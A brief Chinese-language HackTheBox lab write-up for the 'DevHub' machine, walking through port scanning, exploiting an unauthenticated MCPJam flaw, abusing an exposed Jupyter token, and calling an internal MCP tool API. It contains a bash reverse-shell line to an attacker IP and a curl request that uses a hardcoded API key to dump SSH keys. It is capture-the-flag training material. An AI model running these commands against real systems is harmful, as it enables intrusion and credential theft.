HackTheBox DevHub Writeup
HackTheBox DevHub 是一台中等难度的 Linux 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 权限的利用链。
信息收集
rustscan -a 10.129.245.216 -- -sC -sV -oN nmap_result.txt
| 端口 | 备注 |
|---|---|
| 22 | OpenSSH 8.9p1 |
| 80 | nginx 1.18.0 |
| 6274 | MCPJam v1.4.2 |
MCPJam v1.4.2 存在CVE-2026-23744 未授权漏洞
Foothold
python exploit.py -u http://10.129.245.216:6274/ -l 10.10.16.246 -p 4444
USER
ps aux| grep analyst
ss -stnlp
在端口8888运行着Jupyter Notebook并且暴露了token,通过端口转发后,进行命令执行
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.16.246/4444 0>&1'")
ROOT
/opt/opsmcp/server.py发现5000端口运行OPSMCP API 2.1.0
curl -X POST \
http://127.0.0.1:5000/tools/call \
-H "X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a" \
-H "Content-Type: application/json" \
-d '
{
"name":"ops._admin_dump",
"arguments":{
"target":"ssh_keys",
"confirm":true
}
}'